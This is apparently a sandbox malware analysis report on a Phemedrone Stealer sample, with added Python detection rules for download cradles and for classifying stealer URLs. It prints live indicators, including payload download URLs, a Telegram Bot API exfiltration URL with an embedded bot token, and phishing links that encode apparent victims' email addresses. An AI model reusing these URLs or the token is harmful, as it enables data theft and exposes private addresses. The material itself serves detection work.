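        if basename(p["image"]) != "powershell.exe":
            continue
        if POLICY_BYPASS.search(p["cmd"]) and DOWNLOAD_CRADLE.search(p["cmd"]):
            depth = cmd_nesting(ancestry(p["pid"], procs))
            findings.append(("powershell_download_cradle", p["pid"], depth))
    # A PE written by process X into a user-writable path and then started by X.
    drops = {(e["pid"], e["target"].lower())
             for e in events if e["id"] == 11 and USER_WRITABLE_PE.search(e["target"])}
    for p in procs.values():
        if (p["ppid"], p["image"].lower()) in drops:
            findings.append(("dropper_executes_written_pe", p["pid"], p["ppid"]))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(rule, pid, detail)
```

The cradle rule fires only when both the policy bypass and a download primitive appear on the same command line; the nesting depth it reports (3 here) is what separates this sample from an administrator's cmd.exe-launched shell, which yields 0 or 1. The second rule correlates the file-create and process-create events by PID and path and needs no knowledge of the file name, so a renamed dropper still matches.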

Antivirus, Machine Learning and Genetic Malware Detection

Initial sample
Source | Detection | Scanner | Label
DBp7mBJwqD.exe | 0% | ReversingLabs | -

Dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | 100% | Joe Sandbox ML | -
:newads (copy) | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://apitradingview.com | 100% | Avira URL Cloud | malware
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
https://t.me/freakcodingspot | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://t.me/ | 0% | Avira URL Cloud | safe
https://www.graalvm.org/ | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://t.me/TheDyer | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument | 0% | Avira URL Cloud | safe
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundle | 0% | Avira URL Cloud | safe
https://apitradingview.com/WDSecureUtilities.exe | 100% | Avira URL Cloud | malware
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
http://apitradingview.com | 100% | Avira URL Cloud | malware
https://api.tele | 0% | Avira URL Cloud | safe
https://apitradingview.com/ermando1.txt | 100% | Avira URL Cloud | malware
http://get.geojs.io | 0% | Avira URL Cloud | safe
https://get.geojs.io/v1/ip/geo.json | 0% | Avira URL Cloud | safe
https://get.geojs.io | 0% | Avira URL Cloud | safe
http://api.telegram.org | 0% | Avira URL Cloud | safe
https://www.graalvm.org/latest/reference-manual/native-image/metadata/# | 0% | Avira URL Cloud | safe
https://t.me/webster480 | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
get.geojs.io | 172.67.70.233 | true | false | - | unknown
api.telegram.org | 149.154.167.220 | true | true | - | unknown
apitradingview.com | 86.104.15.60 | true | false | - | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument | false | Avira URL Cloud: safe | unknown
https://apitradingview.com/WDSecureUtilities.exe | true | Avira URL Cloud: malware | unknown
https://apitradingview.com/ermando1.txt | true | Avira URL Cloud: malware | unknown
https://get.geojs.io/v1/ip/geo.json | false | Avira URL Cloud: safe | unknown
URLs from memory and binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://t.me/ | WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://apitradingview.com | powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000008.00000002.1582598087.0000019256A19000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://t.me/freakcodingspot | WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.graalvm.org/ | DBp7mBJwqD.exe | false | Avira URL Cloud: safe | unknown
https://api.telegram.org | WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.1582598087.0000019255F29000.00000004.00000800.00020000.00000000.sdmp; WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://t.me/TheDyer | WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp; WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundle | DBp7mBJwqD.exe | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://apitradingview.com | powershell.exe, 00000008.00000002.1582598087.0000019256A19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://get.geojs.io | WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EA37000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.tele | WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.1582598087.0000019255F29000.00000004.00000800.00020000.00000000.sdmp; WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://get.geojs.io | WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.1582598087.0000019255B71000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.1582598087.0000019255B71000.00000004.00000800.00020000.00000000.sdmp; WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.graalvm.org/latest/reference-manual/native-image/metadata/# | DBp7mBJwqD.exe | false | Avira URL Cloud: safe | unknown
https://t.me/webster480 | WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp; WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
86.104.15.60 | apitradingview.com | Netherlands | 44901 | BELCLOUDBG | false
172.67.70.233 | get.geojs.io | United States | 13335 | CLOUDFLARENETUS | false
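The reputation columns above show the blind spot a practitioner has to work around: the Telegram Bot API URL that carries the stolen data (the .../sendDocument call) is rated safe by Avira URL Cloud and marked Malicious: false, because api.telegram.org is a legitimate host, and get.geojs.io, which the stealer uses to geolocate the victim, is likewise rated safe. Only the Telegram IP is flagged. Detection has to key on the URL path, which embeds the bot id and token, and the memory strings also have to be separated from the .NET and PowerShell framework URLs (schemas.xmlsoap.org, contoso.com, nuget.org and the like) that every such process carries. The Python below is an added example written for this page, not Joe Sandbox or Phemedrone code. Its input is a constructed subset of the URL table, the bot token in it is a made-up placeholder in the real format rather than the token the report shows, and the role names and ranking are assumptions.

```python
"""Classify the URLs a stealer leaves in memory and mask Telegram bot tokens
before the indicators are shared.  Added example; the input is constructed."""
import re
from urllib.parse import urlsplit

# Constructed subset of the report's URL table.  The bot token is a
# placeholder with the real shape (numeric bot id, colon, alphanumeric
# secret), not the token printed in the report.
OBSERVED_URLS = [
    "https://apitradingview.com/WDSecureUtilities.exe",
    "https://apitradingview.com/ermando1.txt",
    "https://get.geojs.io/v1/ip/geo.json",
    "https://api.telegram.org/bot1234567890:AAEXAMPLEexampleEXAMPLEexampleEXAMPLE0/sendDocument",
    "https://api.telegram.org/bot",           # truncated string from memory
    "https://t.me/freakcodingspot",
    "http://schemas.xmlsoap.org/wsdl/",       # .NET framework constant
    "https://aka.ms/pscore68",                # PowerShell constant
]

# Host verdicts as the report's URL-reputation columns give them.
REPUTATION = {"apitradingview.com": "malware", "api.telegram.org": "safe",
              "get.geojs.io": "safe", "t.me": "safe"}

# Hosts every .NET / PowerShell process carries in memory; never indicators.
FRAMEWORK_HOSTS = ("schemas.xmlsoap.org", "contoso.com", "nuget.org", "aka.ms",
                   "github.com", "apache.org", "graalvm.org", "pesterbdd.com")

# Bot API path: /bot<numeric id>:<secret>/<method>.  The token in the report
# has a 35-character secret; 30 is used as a conservative lower bound.
BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)$")
EXFIL_METHODS = {"senddocument", "sendmessage", "sendphoto", "sendvideo"}
PAYLOAD_EXT = (".exe", ".dll", ".txt", ".bin", ".ps1")


def classify(url):
    """Return (role, host, bot_id) for one URL; bot_id is None unless present."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host.endswith(FRAMEWORK_HOSTS):
        return ("framework_string", host, None)
    if host == "api.telegram.org":
        m = BOT_PATH.match(parts.path)
        if m and m["method"].lower() in EXFIL_METHODS:
            return ("telegram_exfil", host, m["bot_id"])
        return ("telegram_api", host, m["bot_id"] if m else None)
    if host == "get.geojs.io":
        return ("victim_geolocation", host, None)
    if REPUTATION.get(host) == "malware":
        role = "payload_download" if parts.path.lower().endswith(PAYLOAD_EXT) else "malicious_host"
        return (role, host, None)
    return ("unclassified", host, None)


def redact_token(url):
    """Keep the bot id (it correlates samples) and mask the secret."""
    return re.sub(r"(/bot\d+):[A-Za-z0-9_-]+(/|$)", r"\1:<redacted>\2", url)


def network_iocs(urls):
    """Hosts worth blocking or alerting on, keyed by the strongest role seen."""
    rank = {"payload_download": 4, "telegram_exfil": 4, "malicious_host": 3,
            "victim_geolocation": 2, "telegram_api": 1}
    best = {}
    for u in urls:
        role, host, _ = classify(u)
        if role in rank and rank[role] > rank.get(best.get(host), 0):
            best[host] = role
    return dict(sorted(best.items()))


if __name__ == "__main__":
    for u in OBSERVED_URLS:
        print(classify(u)[0], redact_token(u))
    print(network_iocs(OBSERVED_URLS))
```

Blocking api.telegram.org outright is rarely an option, so the useful output is the bot id: it stays constant across a campaign (the same Telegram IP appears in the other Phemedrone Stealer reports listed further down) and can be matched in TLS-inspected proxy logs or in memory without ever storing the secret.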
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1548278
Start date and time: 2024-11-04 09:37:48 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DBp7mBJwqD.exe (renamed because the original name is a hash value)
Original Sample Name: 86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@15/9@4/3
EGA Information:
• Successful, ratio: 50%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 8016 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: DBp7mBJwqD.exe
Time | Type | Description
03:38:49 | API Interceptor | 132x Sleep call for process: powershell.exe modified
03:39:04 | API Interceptor | 20x Sleep call for process: WDSecureUtilities_548.exe modified
Associated samples by IP
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | nuVM6HVKRG.exe | malicious | Phemedrone Stealer | -
149.154.167.220 | pdLBHF2jCE.exe | malicious | Phemedrone Stealer | -
149.154.167.220 | Request for Quotation MK FMHSRFQ241104.vbe | malicious | GuLoader, Snake Keylogger | -
149.154.167.220 | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | malicious | GuLoader, Snake Keylogger | -
149.154.167.220 | Permintaan Untuk Sebutharga RFQ 087624.vbs | malicious | GuLoader, Snake Keylogger | -
149.154.167.220 | Request for Quotation MK FMHSRFQ241104.vbs | malicious | GuLoader, Snake Keylogger | -
149.154.167.220 | Request for Quotation_MYMRT.vbs | malicious | GuLoader, Snake Keylogger, VIP Keylogger | -
149.154.167.220 | DOC11042024.exe | malicious | GuLoader, Snake Keylogger | -
149.154.167.220 | Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | PO.exe | malicious | MassLogger RAT, PureLog Stealer | -
86.104.15.60 | Lokalkendskab.exe | malicious | GuLoader | park-your-track.com/uXIrhGiBMIRv32.bin
86.104.15.60 | Ödeme makbuzu2.exe (listed as #U00d6deme makbuzu2.exe) | malicious | GuLoader | park-your-track.com/cQHyYR236.bin
172.67.70.233 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ== | malicious | Unknown | -
172.67.70.233 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29t | malicious | Tycoon2FA | -
172.67.70.233 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ== | malicious | HTMLPhisher, Tycoon2FA | -
172.67.70.233 | https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw== | malicious | HTMLPhisher, Tycoon2FA | -
172.67.70.233 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk%2E%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FBpORLlSyDHhQozoQ5XBZtBNm/dGhvbHplckByZGd1c2EuY29t | malicious | HTMLPhisher, Tycoon2FA | -
172.67.70.233 | https://g.page/r/CbPyKO_ogGK3EAg/review | malicious | HTMLPhisher, Tycoon2FA | -
172.67.70.233 | P09Qwe9fqsKdQIyTGnGxNs8xS[1] | malicious | Tycoon2FA | -
172.67.70.233 | vm AUDIO_QzOXYQIfIQZ VOICE September 11th, 2024 attachment.html | malicious | HTMLPhisher, Tycoon2FA | -
172.67.70.233 | Remittance AdviceNote c6b2e2a43485b7b75999a5332e86646f | malicious | HTMLPhisher, Tycoon2FA | -
172.67.70.233 | M 1votFC.eml | malicious | Unknown | -
Associated samples by domain
Match | Associated Sample Name / URL | Detection | Threat Name | Context
get.geojs.io | nuVM6HVKRG.exe | malicious | Phemedrone Stealer | 104.26.1.100
get.geojs.io | pdLBHF2jCE.exe | malicious | Phemedrone Stealer | 104.26.1.100
get.geojs.io | file.exe | malicious | Unknown | 104.26.0.100
get.geojs.io | file.exe | malicious | Unknown | 104.26.0.100
get.geojs.io | http://braintumourresearch.org | malicious | Unknown | 104.26.1.100
get.geojs.io | https://www.filemail.com/t/NU6GESpW | malicious | HTMLPhisher, Tycoon2FA | 104.26.0.100
get.geojs.io | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ== | malicious | Unknown | 172.67.70.233
get.geojs.io | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29t | malicious | Tycoon2FA | 104.26.1.100
get.geojs.io | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2Ff1mgxnH4u4JYtjrvS13irZ65/am9zZWUub3VlbGxldEBjbmVzc3QuZ291di5xYy5jYQ== | malicious | HTMLPhisher, Tycoon2FA | 104.26.0.100
get.geojs.io | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ== | malicious | HTMLPhisher, Tycoon2FA | 172.67.70.233
api.telegram.org | nuVM6HVKRG.exe | malicious | Phemedrone Stealer | 149.154.167.220
api.telegram.org | pdLBHF2jCE.exe | malicious | Phemedrone Stealer | 149.154.167.220
api.telegram.org | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Permintaan Untuk Sebutharga RFQ 087624.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Request for Quotation MK FMHSRFQ241104.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Request for Quotation_MYMRT.vbs | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | DOC11042024.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | PO.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
Associated samples by ASN
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | nuVM6HVKRG.exe | malicious | Phemedrone Stealer | 149.154.167.220
TELEGRAMRU | pdLBHF2jCE.exe | malicious | Phemedrone Stealer | 149.154.167.220
TELEGRAMRU | Request for Quotation MK FMHSRFQ241104.vbe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | Permintaan Untuk Sebutharga RFQ 087624.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | Request for Quotation MK FMHSRFQ241104.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | Request for Quotation_MYMRT.vbs | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | DOC11042024.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | PO.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
CLOUDFLARENETUS | EROctober 31, 2024_Amendment_for_J.thepautIyNURVhUTlVNUkFORE9NMTkjIw==-1.html | malicious | Unknown | 104.21.55.69
CLOUDFLARENETUS | nuVM6HVKRG.exe | malicious | Phemedrone Stealer | 104.26.1.100
CLOUDFLARENETUS | pdLBHF2jCE.exe | malicious | Phemedrone Stealer | 104.26.1.100
CLOUDFLARENETUS | QUOTATION#09678.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | file.exe | malicious | LummaC, Stealc | 188.114.97.3
CLOUDFLARENETUS | Request for Quotation MK FMHSRFQ241104.vbe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | malicious | GuLoader, Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | Permintaan Untuk Sebutharga RFQ 087624.vbs | malicious | GuLoader, Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | Request for Quotation MK FMHSRFQ241104.vbs | malicious | GuLoader, Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | Request for Quotation_MYMRT.vbs | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.97.3
BELCLOUDBG | rhqubIGcyN.exe | malicious | Clipboard Hijacker, Cryptbot | 185.244.181.140
BELCLOUDBG | file.exe | malicious | Amadey, AsyncRAT, Clipboard Hijacker, Cryptbot, MicroClip, Neoreklami, RedLine | 185.244.181.140
BELCLOUDBG | jYDYjpSbvf.exe | malicious | LummaC, Amadey, Clipboard Hijacker, LummaC Stealer, RedLine, SmokeLoader, Stealc | 185.244.181.140
BELCLOUDBG | file.exe | malicious | Clipboard Hijacker, Cryptbot | 185.244.181.140
BELCLOUDBG | file.exe | malicious | Clipboard Hijacker, Cryptbot | 185.244.181.140
BELCLOUDBG | Set-up.exe | malicious | Clipboard Hijacker, Cryptbot | 185.244.181.140
BELCLOUDBG | file.exe | malicious | Clipboard Hijacker, Cryptbot | 185.244.181.140
BELCLOUDBG | Z2LPSpO1yU.exe | malicious | Clipboard Hijacker, Cryptbot | 185.244.181.140
BELCLOUDBG | Set-up.exe | malicious | Clipboard Hijacker, Cryptbot | 185.244.181.140
BELCLOUDBG | 81zBpBAWwc.exe | malicious | RHADAMANTHYS | 91.92.137.228
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | nuVM6HVKRG.exe | malicious | Phemedrone Stealer | 149.154.167.220, 86.104.15.60, 172.67.70.233
3b5074b1b5d032e5620f69f9f700ff0e | pdLBHF2jCE.exe | malicious | Phemedrone Stealer | 149.154.167.220, 86.104.15.60, 172.67.70.233
3b5074b1b5d032e5620f69f9f700ff0e | QUOTATION#09678.exe | malicious | AgentTesla | 149.154.167.220, 86.104.15.60, 172.67.70.233
3b5074b1b5d032e5620f69f9f700ff0e | Fattura88674084.vbs | malicious | Unknown | 149.154.167.220, 86.104.15.60, 172.67.70.233
3b5074b1b5d032e5620f69f9f700ff0e | givingbestthignswithgreatheatcaptialthingstodo.hta | malicious | Cobalt Strike, HTMLPhisher | 149.154.167.220, 86.104.15.60, 172.67.70.233
3b5074b1b5d032e5620f69f9f700ff0e | Request for Quotation MK FMHSRFQ241104.vbe | malicious | GuLoader, Snake Keylogger | 149.154.167.220, 86.104.15.60, 172.67.70.233
3b5074b1b5d032e5620f69f9f700ff0e | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220, 86.104.15.60, 172.67.70.233
3b5074b1b5d032e5620f69f9f700ff0e | Purchase order.vbs | malicious | Unknown | 149.154.167.220, 86.104.15.60, 172.67.70.233
3b5074b1b5d032e5620f69f9f700ff0e | Permintaan Untuk Sebutharga RFQ 087624.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220, 86.104.15.60, 172.67.70.233
3b5074b1b5d032e5620f69f9f700ff0e | EE85716273#U00b7pdf.vbs | malicious | Remcos, GuLoader | 149.154.167.220, 86.104.15.60, 172.67.70.233
                                                          No context
                                                          Process:C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):252416
